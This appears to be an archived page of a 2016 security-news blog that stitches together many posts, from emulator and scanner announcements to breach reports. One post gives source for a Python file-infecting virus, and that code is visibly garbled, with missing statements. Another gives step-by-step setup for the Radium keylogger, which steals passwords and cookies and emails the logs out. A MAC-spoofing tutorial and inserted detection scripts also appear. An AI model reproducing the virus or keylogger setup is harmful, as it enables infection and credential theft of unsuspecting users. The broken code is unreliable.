Tuesday, 20 December 2016

Nathan: Android Emulator for Mobile Security Testing Tool

Nathan is a 5.1.1 SDK 22 AOSP Android emulator customized to perform mobile security assessment.

Supported architectures:
arm (soon)

The emulator is equipped with the Xposed Framework and the following pre-installed modules:

  • SSLUnpinning, to bypass SSL certificate pinning.
  • Inspeckage, to perform the dynamic analysis of an application.
  • RootCloak, to bypass root detection.

The following tools are already installed:

  • SuperSU: Superuser access management tool
  • Drozer: Comprehensive security and attack framework for Android


  • Only Python 2.7.x required
  • Hooking ready with Xposed
  • Pre-installed tools for application analysis
  • Fully customizable
  • Snapshot and restore of user data


Download Nathan core scripts from git:
$ git clone
$ cd nathan

Init Nathan for the first time (for downloading firmware files)
$ ./ init 

If a proxy is required to download files, the parameter -dp is available:
$ ./ init -dp
The init command downloads all the files required to run the Nathan emulator.


To start Nathan:
$ ./ start

To redirect the traffic through a proxy, the parameter -p can be used:
$ ./ start -p

To create a snapshot of current user image data with a label (current in this case):
$ ./ snapshot -sl current 
To restore the emulator to the snapshot with label current:
$ ./ restore --rl current

To get a list of available snapshots to restore:
$ ./ restore --ll  
Every time the emulator is started, a temporary copy of the system image is created, and any changes made to system data are lost when the emulator is powered off.

To make the changes permanent, the command freeze is available:
$ ./ freeze  

To push files from a folder to a running Nathan emulator, the command push is available:
$ ./ push -f folder  

The complete list of commands is:

usage: [-h] [-v] [-a ARCH]
{init,start,snapshot,restore,freeze,push} ...

Optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Show emulator/kernel logs
  -a ARCH, --arch ARCH  Select architecture (arm/x86) - Default = x86

Command to run:
    init                Download and init Nathan emulator
    start               Start Nathan emulator
    snapshot            Create userdata image snapshot
    restore             Restore userdata image snapshot
    freeze              Freeze temporary system image
    push                Push files to Nathan emulator 
The parameter -h for each command shows specific options.

Thursday, 10 November 2016

22 Year Old Student Arrested For Cyber Stalking

A 22-year-old student named Kishan, studying in the second year at AJC Bose College, has been arrested for being involved in cyber stalking. The hacker hacked the Facebook account of a victim in class 10 living in the Tiljala area.
According to joint CP (crime) Vishal Garg, the hacker first hacked the victim's Facebook account in early July and changed the password. Being unaware of the hack, the girl decided to create a new account. As soon as the girl opened a new account, the hacker started to post obscene images on both accounts, tagging all their friends. The girl and her parents registered a case at the police station on July 18.
Vishal Garg also mentioned that the hacker had even demanded $120 (Rs 10,000) from the minor to stop sending obscene images.
“We have added charges of extortion besides the IT Act against the accused,” he said.
“We took help of Facebook authorities through proper channels and based on their feedback, we arrested the accused. We have recovered two mobile phones used by the accused to carry out the hacking,” he added.

Create Your Own Ubuntu 16.04 or 16.10 Live ISO with MeX and Refracta

GNU/Linux developer Arne Exton is always ahead of time, and it looks like he has just released a new build of his MeX GNU/Linux distribution that ships with the Refracta tools pre-installed.
MeX Build 161030 arrived a couple of days ago, based on the Debian GNU/Linux 8.6 “Jessie” and Ubuntu 16.04.1 LTS (Xenial Xerus) operating systems. It includes a special 4.8.0-25-exton kernel injected with support for additional hardware components, and uses the latest Cinnamon 3.0.7 desktop environment that comes with Linux Mint 18.
However, the new feature of the MeX Build 161030 release is the integration of the Refracta tools, which let users create their own installable and bootable Ubuntu Live ISO images, which can be based on either the Ubuntu 16.04.1 LTS (Xenial Xerus) or Ubuntu 16.10 (Yakkety Yak) operating systems.
“You can use the Refracta tools (pre-installed in MeX Build 161030) to create your own installable Ubuntu Live DVD once you have installed MeX to hard drive,” said Arne Exton in the release announcement. “I mean change everything and then create a whole new Ubuntu 16.04 or 16.10 live system.”
When attempting to create your own Ubuntu-based Live ISO, you should know that you don’t even have to install the MeX operating system on your personal computer, as the Refracta tools work straight from the Live DVD, according to Arne Exton, but you’ll need to have plenty of system memory (RAM) for things to work as expected.
The entire Ubuntu ISO creation process won’t take more than 5 to 10 minutes using the Refracta tools. As one might have expected, all the packages included in MeX Build 161030 have been updated as of October 30, 2016, and you can study the full list of pre-installed packages. In the meantime, download MeX Build 161030 right now via our website.

Images of Upcoming Nokia D1C Leaked and They Look Gorgeous

Day after day we are getting more news about Nokia’s upcoming smartphones. The information we get from most of the sources is not reliable, as one contradicts the other.
A few days back we got news about the company HMD Global building the Nokia phones in the coming years. They have already appointed a UK-based independent PR agency, Mother, to take care of the marketing campaign.
We can be sure that the Mother’s first project won’t come out until next year, which suggests that HMD Global might not introduce any Nokia handsets the current year.
Previous rumors claimed the first Nokia phones in a long time will be unveiled later this year, while two other high-end phones might be revealed in Q2 2017.
One of these unannounced smartphones appeared in many leaks as the Nokia D1C. Some pictures of the alleged phone emerged several weeks ago, so pretty much every Nokia fan was willing to jump on the hype train.
Unfortunately, we might have to wait a while longer for the first Nokia phones to arrive, as HMD Global is more concerned about marketing and distribution of these devices.

Three Different Colors, Specs and Designs

Still, it doesn’t hurt to learn a bit more about Nokia’s upcoming smartphones, even if they haven’t been confirmed yet. A set of images showing the alleged Nokia D1C have just leaked directly from China.
These renders are based on the images of real Nokia prototypes, the source claims. Even if HMD Global could still make some changes to the final design of the phone, at least we have an idea of what’s to come.
Three versions of the Nokia D1C are rumored to arrive on the market: Gold, Black and White. However, only the Gold version will come with a fingerprint sensor, whereas the Black and White colors will lack this feature.
Also, the Black and White versions of the D1C will have a metal frame and polycarbonate back cover, while the Gold model should feature an all-metal unibody design. We believe these rumors are a bit far-fetched, so take them with a pinch of salt.

OpenDoor – OWASP Directory Access Scanner

OpenDoor is open-source software that scans a site's directories and finds all possible ways to log in, empty directories and entry points. Scans are conducted using the dictionary that is included in the application.

System Requirements:

  • Python 2.7.x

Installation command:

sudo pip install -r requirements.txt


  • multithreading
  • filesystem log
  • detect redirects
  • random user agent
  • random proxy from proxy list
  • verbose mode
  • subdomains scanner

How to use:

python ./ --url ""

Note: This tool is only for informational purposes and organizations is prohibited.

Cyber Criminals Attacking LinkedIn Users With Phishing Scam

Cyber criminals are now targeting LinkedIn users with a phishing scam in which they trick users into believing that their LinkedIn account has a security issue that can be solved only by providing their personal details. The email that is targeting users comes from postmaster [@] fnotify [dot] com, which is not linked with LinkedIn. However, it was found that the domain associated with the email is actually a WordPress blog registered to Torgeir Salvesen from Finland.
The password reset link, which has been censored by the researchers, is actually LinkedIn’s password reset link, which asks users to change their password to prevent it from being misused. The cyber criminals also made a lot of errors, and it looks like they forgot to put the real phishing link behind the password reset link.
The email content also contains another link, which redirects to a Dropbox link. The Dropbox link asks users to upload a viewable scanned copy of the payment method, the account holder’s government-issued photo identification (that is, a driver’s license or passport) and a payment receipt.
This was identified by researchers at Heimdal Security, who pointed out that the main reason behind this scam is to steal users’ financial details and driving license or passport copies. The purpose of collecting this information is not only to hijack their accounts but also to conduct further scams by stealing their identity.

Radium Keylogger – A Keylogger Using Python

Python keylogger with multiple features.


Install and Use:

Step 1: Download the libraries if you are missing any.
Step 2: Set the Gmail username and password and remember to check allow connection from less secure apps in gmail settings.
Step 3: Set the FTP server. Make the folder Radium in which you’ll store the new version of exe.
Step 4: Set the FTP ip, username, password.
Note: Remember to encode the password in base64.
Step 5: Set the originalfilename variable in copytostartup(). This should be equal to the name of the exe.
Step 6: Make the exe using Pyinstaller
Step 7: Keylogs will be mailed after every 300 key strokes. This can be changed.
Step 8: Screenshot is taken after every 500 key strokes. This can be changed.
Step 9: Remember: If you make this into exe, change the variable “originalfilename” and “coppiedfilename” in function copytostartup().
Step 10: Remember: whatever name you give to “coppiedfilename“, should be given to checkfilename in deleteoldstub().


  • Applications and keystrokes logging
  • Screenshot logging
  • Drive tree structure
  • Logs sending by email
  • Password Recovery for
    • Chrome
    • Mozilla
    • Filezilla
    • Core FTP
    • CyberDuck
    • FTPNavigator
    • WinSCP
    • Outlook
    • Putty
    • Skype
    • Generic Network
  • Cookie stealer
  • Keylogger stub update mechanism
  • Gather system information
    • Internal and External IP
    • Ipconfig /all output
    • Platform

Things to work on:

  • Persistence
  • Taking screenshots after a specific time. Making it keystrokes independent.
  • Webcam logging
  • Skype chat history stealer
  • Steam credential harvester


A New Vulnerability In Chrome For Android Allows Hackers To Download Trojan In Your Device

A new vulnerability has been found in Chrome for Android that allows hackers to quietly download banking trojan apps (.apk) onto a user’s device without their knowledge. A pop-up ad appears out of nowhere, tells you that your mobile device has been infected with a dangerous virus, and instructs you to install a security app to remove it immediately.
However this malicious advertising web page automatically downloads an APK file to your device without requiring any approval. When an APK file is broken down into pieces and handed over to the save function via Blob() class, there is no check for the type of the content being saved, so the browser saves the APK file without notifying the user, according to a security expert.

Since this August the Trojan has infected over 318,000 Android devices across the world. Google has acknowledged the issue, blocked the malicious ads and planned to patch it in the next update of Chrome.

iPhone Has A Secret One-Handed Keyboard Which You Didn’t Know About It All This Time

Developer Steve Troughton-Smith recently discovered hidden code for a one-handed keyboard in Apple’s iOS by hacking an iOS Simulator. The shocking fact is that this one-handed keyboard has been there since the launch of iOS 8 over two years ago.
However there is something similar on your iPhone already, with the landscape keyboard offering several shortcuts. But this version happens to push either side of the QWERTY portrait keyboard across in order to reach the shortcut options.
You won’t be able to make use of it unless you go through the same unofficial route as Steve.  So if you really wanna make your keyboard experience easier then take your jailbroken device and get swiping.

Britain’s Tesco Bank Hacked and 20,000 Customers Lost Their money

Britain’s Tesco Bank temporarily froze all online transactions Monday after around 20,000 customers had money stolen from their accounts in a hack attack.
The bank, a subsidiary of British supermarket giant Tesco, the kingdom’s biggest retailer, said it was trying to refund accounts as quickly as possible.
“Tesco Bank can confirm that, over the weekend, some of its customer current accounts have been subject to online criminal activity, in some cases resulting in money being withdrawn fraudulently,” chief executive Benny Higgins said in a statement.
The bank confirmed that of its 136,000 current account holders, 40,000 had seen suspicious transactions over the weekend, while money had been fraudulently withdrawn from around 20,000 accounts.

No figure was given for the total amount of money involved.
Tesco shares dipped by 1.28 percent to 199.90 pence in early London trading, as London stocks rose by 1.3 percent.
“We can reassure customers that any financial loss as a result of this activity will be resolved fully by Tesco Bank,” said Higgins.
The retail bank is working with the National Crime Agency and the Financial Conduct Authority to address the security breach.
“It will be investigated and hopefully that will lead to action and arrests,” an NCA spokesman said.
The spokesman said cyber-attacks tended to vary in terms of sophistication so there was no set formula for dealing with them.

Higgins told BBC radio: “We invest very heavily in ensuring we have preventative measures in respect of this kind of fraudulent activity but in the modern world it’s impossible to be totally impregnable.”
Tesco Bank opened in 1997 and has 7.8 million customer accounts.

Wednesday, 9 November 2016

Unable to locate package in Ubuntu while trying to install packages by apt

First, check if the package actually exists:
  1. Go to with a web browser.
  2. Scroll down to "Search package directories"
  3. Enter the package which you're trying to install into the "Keyword" field.
    Enable "Only show exact matches:"
    Change the "Distribution" to which version of Ubuntu you're using.
If there are no results, the package you are looking for doesn't exist and the next steps will not work. It may require a third party PPA or an alternative installation method.
If results are found, the package exists and you may continue with these steps:
  1. Open Software Sources (or Software & Updates in 13.04+) by searching for it in the Dash.
  2. Open the "Ubuntu Software" tab.
  3. Ensure that the first 4 check boxes on this tab are enabled:
  4. Update the package lists, then test with these commands:
    sudo apt-get update
    sudo apt-get install <TEST_PACKAGE>


Thursday, 3 November 2016

How to make a simple computer virus in Python

A computer virus is a type of malicious software program (“malware”) that, when executed, replicates by reproducing itself (copying its own source code) or infecting other computer programs by modifying them. Infected targets can also include data files or the “boot” sector of the hard drive. When this replication succeeds, the affected areas are then said to be “infected” with a computer virus. The term “virus” is also commonly, but erroneously, used to refer to other types of malware. “Malware” encompasses computer viruses along with many other forms of malicious software, such as computer “worms”, ransomware, trojan horses, keyloggers, rootkits, spyware, adware, malicious Browser Helper Objects (BHOs) and other malicious software. The majority of active malware threats are actually trojan horse programs or computer worms rather than computer viruses. The term computer virus, coined by Fred Cohen in 1985, is a misnomer. Viruses often perform some type of harmful activity on infected host computers, such as acquisition of hard disk space or central processing unit (CPU) time, accessing private information (e.g., credit card numbers), corrupting data, displaying political or humorous messages on the user’s screen, spamming their e-mail contacts, logging their keystrokes, or even rendering the computer useless. However, not all viruses carry a destructive “payload” or attempt to hide themselves. The defining characteristic of viruses is that they are self-replicating computer programs which install themselves without user consent.

Virus writers use social engineering deceptions and exploit detailed knowledge of security vulnerabilities to gain access to their hosts’ computers and computing resources. The vast majority of viruses target systems running Microsoft Windows, employing a variety of mechanisms to infect new hosts, and often using complex anti-detection/stealth strategies to evade antivirus software. Motives for creating viruses can include seeking profit (e.g., with ransomware), desire to send a political message, personal amusement, to demonstrate that a vulnerability exists in software, for sabotage and denial of service, or simply because they wish to explore cybersecurity issues, artificial life and evolutionary algorithms.

In this article we are going to code a simple Python virus.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.

import os
import datetime
def search(path):
    filestoinfect = []
    filelist = os.listdir(path)
    for fname in filelist:
        if os.path.isdir(path+"/"+fname):
        elif fname[-3:] == ".py":
            infected = False
            for line in open(path+"/"+fname):
                if SIGNATURE in line:
                    infected = True
            if infected == False:
    return filestoinfect
def infect(filestoinfect):
    virus = open(os.path.abspath(__file__))
    virusstring = ""
    for i,line in enumerate(virus):
        if i>=0 and i <39:
            virusstring += line
    for fname in filestoinfect:
        f = open(fname)
        temp =
        f = open(fname,"w")
        f.write(virusstring + temp)
def bomb():
    if == 1 and == 25:
filestoinfect = search(os.path.abspath(""))

The code performs a search for Python files and makes all the strings into the following string: “HAHA YOU ARE AFFECTED BY VIRUS!! AND THAT”S AN EVIL LAUGH BY THE WAY!!”.
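The defender's view of the same behaviour, as an added example that is not part of the original post: infect() writes the first 39 lines of its own file in front of every .py file it touches, so affected files (and the original script) all begin with an identical 39-line block. The function names and the constructed sample tree below are assumptions made for illustration.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

# The page's infect() copies lines 0..38 of its own file, i.e. 39 lines.
PREFIX_LINES = 39


def leading_block_digest(path, n_lines=PREFIX_LINES):
    """SHA-256 of the first n_lines lines of a file, or None if it is shorter."""
    lines = []
    with open(path, "rb") as fh:          # bytes: no decoding errors, exact match
        for line in fh:
            lines.append(line)
            if len(lines) == n_lines:
                break
    if len(lines) < n_lines:
        return None
    return hashlib.sha256(b"".join(lines)).hexdigest()


def find_shared_prefixes(root, n_lines=PREFIX_LINES, min_files=2):
    """Group .py files under root by their leading block.

    Returns {digest: [paths]} for blocks shared by at least min_files files.
    A shared licence header of the same length also matches, so every group
    needs a manual look before it is treated as an infection.
    """
    groups = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".py"):
                continue
            path = os.path.join(dirpath, name)
            try:
                digest = leading_block_digest(path, n_lines)
            except OSError:
                continue                  # unreadable file: skip, keep scanning
            if digest is not None:
                groups[digest].append(path)
    return {d: sorted(p) for d, p in groups.items() if len(p) >= min_files}


def demo():
    """Scan a constructed tree: two files share a harmless 39-line stand-in
    block (comments only), one file is untouched."""
    stand_in = "".join(
        "# constructed stand-in line %d\n" % i for i in range(PREFIX_LINES)
    )
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "pkg"))
        samples = {
            "app.py": stand_in + "print('app')\n",
            os.path.join("pkg", "util.py"): stand_in + "def helper():\n    return 1\n",
            "clean.py": "import sys\nprint(sys.argv)\n",
        }
        for rel, text in samples.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(text)
        hits = find_shared_prefixes(root)
        return sorted(os.path.basename(p) for paths in hits.values() for p in paths)


if __name__ == "__main__":
    print(demo())
```

Comparing the files against a clean copy from version control or a package manager then shows exactly which lines were prepended.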

How To Spoof MAC Address Using Macchanger in Kali Linux

MAC address spoofing is a technique for temporarily changing your Media Access Control (MAC) address on a network device. A MAC Address is a unique and hardcoded address programmed into network devices which cannot be changed permanently. The MAC address is in the 2nd OSI layer and should be seen as the physical address of your interface. Macchanger is a tool that is included with any version of Kali Linux including the 2016 rolling edition and can change the MAC address to any desired address until the next reboot. In this tutorial we will be spoofing the MAC address of our wireless adapter with a random MAC address generated by Macchanger on Kali Linux.

MAC Address Spoofing

First we need to take down the network adapter in order to change the MAC address. This can be done using the following command:

ifconfig wlan1 down

Replace wlan1 with your own network interface.

Now use the following command to change your MAC address to a new random MAC Address:

macchanger -r wlan1

As shown on the screenshot, Macchanger will show you the permanent, current and changed MAC address. The permanent MAC address will be restored to your network adapter after a reboot, or you can reset your network adapter's MAC address manually. Use the following command to restore the permanent MAC address to your network adapter manually:

macchanger --permanent wlan1

You can also spoof a particular MAC address using the following command:

macchanger -m [Spoofing MAC Address] wlan1

macchanger -m XX:XX:XX:XX:XX:XX wlan1

If you receive the following error you need to take down the network interface first before changing the MAC Address (Command: ifconfig wlan1 down):

ERROR: Can’t change MAC: interface up or not permission: Cannot assign requested address

Use the following command to bring up your network adapter with the new MAC address:

ifconfig wlan1 up

Use the following command to show the current MAC address:

macchanger --show wlan1
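How the address changes described above look from the network side, as an added example that is not part of the original tutorial: it reads per-port MAC observations and reports every port whose address changed, noting whether the new address has the locally administered bit set and whether it was already seen on another port. The observation format, port names and addresses are constructed, and treating the locally administered bit as a hint of a randomly generated address is an assumption; an address set with -m can copy a real vendor address and will not show it.

```python
import re

MAC_RE = re.compile(r"^[0-9a-f]{2}(?:[:-][0-9a-f]{2}){5}$", re.IGNORECASE)


def normalize_mac(text):
    """Return the address as lower-case colon-separated hex, or raise ValueError."""
    text = text.strip()
    if not MAC_RE.match(text):
        raise ValueError("not a MAC address: %r" % text)
    return ":".join(part.lower() for part in re.split(r"[:-]", text))


def is_locally_administered(mac):
    """True if bit 0x02 of the first octet is set (address not vendor-assigned)."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x02)


def mac_changes(observations):
    """observations: iterable of (timestamp, port, mac) in time order.

    Returns one finding per change of address on a port.
    """
    last_on_port = {}   # port -> last address seen there
    ports_of_mac = {}   # address -> set of ports it has appeared on
    findings = []
    for timestamp, port, raw in observations:
        mac = normalize_mac(raw)
        previous = last_on_port.get(port)
        if previous is not None and previous != mac:
            findings.append({
                "time": timestamp,
                "port": port,
                "old": previous,
                "new": mac,
                "locally_administered": is_locally_administered(mac),
                # the same address on a second port suggests a cloned address
                "seen_on_other_port": bool(ports_of_mac.get(mac, set()) - {port}),
            })
        last_on_port[port] = mac
        ports_of_mac.setdefault(mac, set()).add(port)
    return findings


# Constructed observations (for example from a switch MAC table export).
OBSERVATIONS = [
    ("2016-11-03T10:00:00", "Gi0/1", "00:1A:2B:3C:4D:5E"),
    ("2016-11-03T10:05:00", "Gi0/2", "00:1a:2b:aa:bb:cc"),
    ("2016-11-03T10:07:00", "Gi0/1", "00-1A-2B-3C-4D-5E"),  # same address, other notation
    ("2016-11-03T10:09:00", "Gi0/1", "5e:9f:10:22:33:44"),  # changed, 0x02 bit set
    ("2016-11-03T10:20:00", "Gi0/2", "00:1a:2b:3c:4d:5e"),  # changed to Gi0/1's old address
]

if __name__ == "__main__":
    for finding in mac_changes(OBSERVATIONS):
        print(finding)
```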

Anonymous Warns The World: “World War 3 Is Coming Soon”

If we talk about the possibility of the WWIII, different people have different opinions. While some people call it a far-fetched possibility, others cite some recent events and say that WWIII is closer than ever.

Along the similar lines, the hacktivist collective Anonymous has released a new video warning the people about the World War 3.

What’s the basis of such prediction? Well, in recent times, Britain and the United States promised troops are preparing to move to Poland in NATO’s biggest military build-up on Russian borders since the Cold War.

Also, according to another report, across Russia, 40 million military personnel and civilians have just finished up emergency drills. This exercise has been done to prepare the people to protect themselves against any imminent possibility of nuclear or biological war.

The video talks about China, whose defense minister recently told his country’s citizens to be prepared for the “people’s war at sea”. It also states China’s latest positioning and testing of nuclear weapons.

“Even the United States has confirmed that China has tested an Intercontinental Ballistic Missile, which is capable of striking everywhere in the world within half an hour,” the video says.


Thursday, 29 September 2016

Explained: How Criminals Hack Your Chip And Pin Card


EMV credit cards have till now been assumed to be unhackable. The security professor from the University of California explains how it is NOT so.
With advancing technology and given enough time, anything and everything can be hacked. We have already seen events such as car hacking and whole corporations brought down by attackers, and the recent revelations by an ex-NSA contractor that your smartphone can be hacked with just one SMS make security a serious issue in the contemporary world.
Now, the latest buzz is that even the new EMV (Europay, MasterCard, and Visa) credit card verification chip system that was supposedly promised by these companies to be unhackable has been exposed. The EMV cards have inbuilt microprocessor chips that give it a double layered security. It works analogous to the two-factor authentication, generating a unique code each time you use your credit card rendering it almost impossible for the hacker to steal your information. Well, almost…
Professor Ross Anderson from the Computer Laboratory at the University of Cambridge explains in this video how the black-hats compromise the Chip & Pin system to gain access to the sensitive information.